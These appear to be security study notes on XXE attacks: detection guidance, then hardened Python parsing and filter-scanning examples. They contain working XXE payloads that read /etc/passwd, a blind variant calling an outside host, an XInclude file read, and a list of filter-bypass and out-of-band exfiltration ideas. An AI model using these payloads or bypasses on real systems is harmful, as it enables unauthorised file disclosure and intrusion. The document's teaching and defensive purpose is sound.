XXE

# XXE >> server-side attack

# XML is used to provide information about a document (markup)

# tags and data are defined by the user

# SPA >> single page application >> API

# XML = SOAP
# REST API = JSON

1. Brief Description

• Definition: XXE is an attack that exploits XML parsers that improperly process external entities.
• Impact: Allows attackers to read local files, execute remote requests, and in some cases execute code or cause Denial of Service (DoS).
• Common Targets: Systems accepting XML input, including web services, SOAP APIs, and XML-based file uploads.

2. Where to Detect

• User Inputs: Forms or fields accepting XML input.
• File Uploads: Systems allowing XML file uploads.
• APIs: SOAP or REST APIs using XML.
• Document Processing: Applications that process XML documents, including Office files and SVGs.
• Configuration Files: Any place where XML configuration files are processed.

3. How to Detect

Manual Inspection:

• Look for XML parsers that support external entities.
• Check for a DTD (Document Type Definition) in XML files.

Automated Scanning:

• Use tools like Burp Suite or OWASP ZAP with XXE detection capabilities.

Fuzzing:

• Inject XXE payloads in XML inputs.

Static Code Analysis:

• Scan code for XML parsers that do not disable external entities.

Penetration Testing:

• Test API endpoints and file uploads with crafted XML payloads.
 ===============================
==============

Basic Payloads:

Read local files :


<!DOCTYPE foo [<!ENTITY foo ANY> <!ENTITY xxe
SYSTEM "file:///etc/passwd"> ]>
<foo> &xxe; </foo>

Blind XXE :
<!DOCTYPE foo [<!ENTITY foo ANY> <!ENTITY xxe
SYSTEM "http://web.com"> ]>
<foo> &xxe; </foo>

<foo
xmlns:xi="http://www.w3.org/2001/XInclude"><xi:inclu
de parse="text" href="file:///etc/passwd"/></foo>
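The static-analysis item in section 3 ("parsers that do not disable external entities") and the payloads above are easiest to understand side by side. The following is an added example, not part of the original notes: it configures Python's built-in expat parser to refuse any DOCTYPE and any external entity reference, builds a plain tree from what remains, and runs the file-read and XInclude payload shapes (reconstructed here as constructed test inputs) plus a benign document through it. The element/attribute tree format and the function names are this example's own.

```python
"""Hardened parsing of untrusted XML with Python's built-in expat parser.

Added example (not from the original notes). It uses the file-read and
XInclude payload shapes quoted above as constructed test inputs and shows
what a parser that refuses DTDs and external entities does with them.
"""
from xml.parsers import expat


class XxeRejected(ValueError):
    """The document tried to declare a DTD or reference an external entity."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML into nested dicts {tag, attrs, text, children}.

    Any DOCTYPE or external entity reference aborts the parse with XxeRejected,
    so neither internal nor external entities can ever be expanded.
    """
    parser = expat.ParserCreate()
    # Never read parameter entities (external DTD subsets) from disk or network.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before any <!ENTITY ...> in the internal subset is read.
        raise XxeRejected(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def reject_external_entity(context, base, sysid, pubid):
        # Belt and braces: only reachable if a DTD somehow got past the handler above.
        raise XxeRejected(f"external entity {sysid!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity

    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end(tag):
        stack.pop()

    def chars(text):
        # expat may deliver text in several chunks; concatenate them.
        stack[-1]["text"] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return root["children"][0]


def parse_or_reject(data: bytes) -> tuple:
    """Return ("ok", tree) or ("rejected", reason); the reason is what you would log."""
    try:
        return "ok", parse_untrusted_xml(data)
    except (XxeRejected, expat.ExpatError) as exc:
        return "rejected", str(exc)


# Constructed inputs: the two payload shapes from the notes above plus a benign order document.
FILE_READ_PAYLOAD = (
    b'<!DOCTYPE foo [<!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    b"<foo> &xxe; </foo>"
)
XINCLUDE_PAYLOAD = (
    b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    b'<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)
BENIGN_DOCUMENT = b'<order id="7"><item>book</item></order>'


if __name__ == "__main__":
    samples = [("file read", FILE_READ_PAYLOAD), ("xinclude", XINCLUDE_PAYLOAD), ("benign", BENIGN_DOCUMENT)]
    for label, doc in samples:
        status, detail = parse_or_reject(doc)
        print(f"{label:9} -> {status}: {detail if status == 'rejected' else detail['tag']}")
```

The DOCTYPE handler is the real control: it runs as soon as `<!DOCTYPE` is seen, so the `<!ENTITY xxe SYSTEM ...>` declaration is never read and `&xxe;` is never expanded. The XInclude payload is different: expat implements no XInclude at all, so this parser returns it as an ordinary `xi:include` element and reports "ok". That is harmless here, but the same tree becomes dangerous the moment it is handed to a processor with XInclude enabled (for example lxml's `xinclude()` or a Java factory with `setXIncludeAware(true)`), which is why section 3's code review should cover that setting as well as entity handling.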

5. Defense Bypass Techniques

Encoding:

• Encode payloads to bypass filters.

Chained Attacks:

• Combine XXE with other vulnerabilities like SSRF or RCE.

Out-of-Band (OOB):

• Use external servers to capture exfiltrated data.

Conditional Execution:

• Use conditional entities to bypass detection mechanisms.
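The "Encoding" item above is the one that most often defeats home-grown input filters: a WAF rule or pre-parse check that greps the raw bytes for `<!DOCTYPE` sees nothing when the document arrives as UTF-16, because every ASCII character is interleaved with a zero byte. The following is an added example, not part of the original notes, of a pre-parse indicator check that first applies the XML specification's encoding detection (byte-order mark, first-bytes sniffing, then the `encoding` attribute of the XML declaration) and only then searches for DTD, entity and XInclude markers. The `naive_scan` function is included purely to show the gap; `find_xxe_indicators` is the version to deploy. Function names and the indicator list are this example's own choices.

```python
"""Encoding-aware pre-parse check for DTD, entity and XInclude indicators.

Added example (not from the original notes). A byte-level grep misses a
UTF-16 document; decoding per XML's own encoding-detection rules first
closes that gap.
"""
import codecs
import re

# Markers that have no business in ordinary API input.
INDICATORS = ("<!DOCTYPE", "<!ENTITY", "www.w3.org/2001/XInclude")

# Encoding declaration in the XML prolog, e.g. <?xml version="1.0" encoding="ISO-8859-1"?>
_ENCODING_DECL = re.compile(rb'<\?xml[^>]*encoding=["\']([A-Za-z0-9._-]+)["\']')


def detect_encoding(data: bytes) -> str:
    """Apply XML's encoding detection: BOM, then first-bytes sniffing, then the declaration."""
    if data.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"
    if data.startswith(codecs.BOM_UTF16_LE) or data.startswith(codecs.BOM_UTF16_BE):
        return "utf-16"  # the BOM-aware codec picks the byte order itself
    if data.startswith(b"<\x00?\x00"):
        return "utf-16-le"  # '<?' without a BOM, little-endian
    if data.startswith(b"\x00<\x00?"):
        return "utf-16-be"  # '<?' without a BOM, big-endian
    match = _ENCODING_DECL.match(data)
    if match:
        name = match.group(1).decode("ascii")
        try:
            codecs.lookup(name)
            return name
        except LookupError:
            pass  # unknown codec name: fall through to the XML default
    return "utf-8"


def decode_xml(data: bytes) -> str:
    """Decode the document the way an XML parser would before tokenising it."""
    return data.decode(detect_encoding(data), errors="replace")


def find_xxe_indicators(data: bytes) -> list:
    """Indicators present after decoding; an empty list means none were found."""
    text = decode_xml(data)
    return [marker for marker in INDICATORS if marker in text]


def naive_scan(data: bytes) -> list:
    """The byte-level check many filters use; shown only to demonstrate what it misses."""
    return [marker for marker in INDICATORS if marker.encode("ascii") in data]


# Constructed samples: the file-read payload shape from the notes, and the XInclude shape.
DTD_PAYLOAD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    "<foo> &xxe; </foo>"
)
XINCLUDE_DOC = (
    b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    b'<xi:include parse="text" href="file:///etc/passwd"/></foo>'
)


if __name__ == "__main__":
    for label, doc in [
        ("utf-8", DTD_PAYLOAD.encode("utf-8")),
        ("utf-16 + BOM", DTD_PAYLOAD.encode("utf-16")),
        ("utf-16-le, no BOM", DTD_PAYLOAD.encode("utf-16-le")),
        ("xinclude", XINCLUDE_DOC),
    ]:
        print(f"{label:18} naive={naive_scan(doc)!s:26} aware={find_xxe_indicators(doc)}")
```

Treat a hit from this check as a reason to reject the request and log it, not as a substitute for a parser that has DTDs and external entities disabled: the check catches the encoding trick, but the parser configuration is what actually stops entity expansion.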
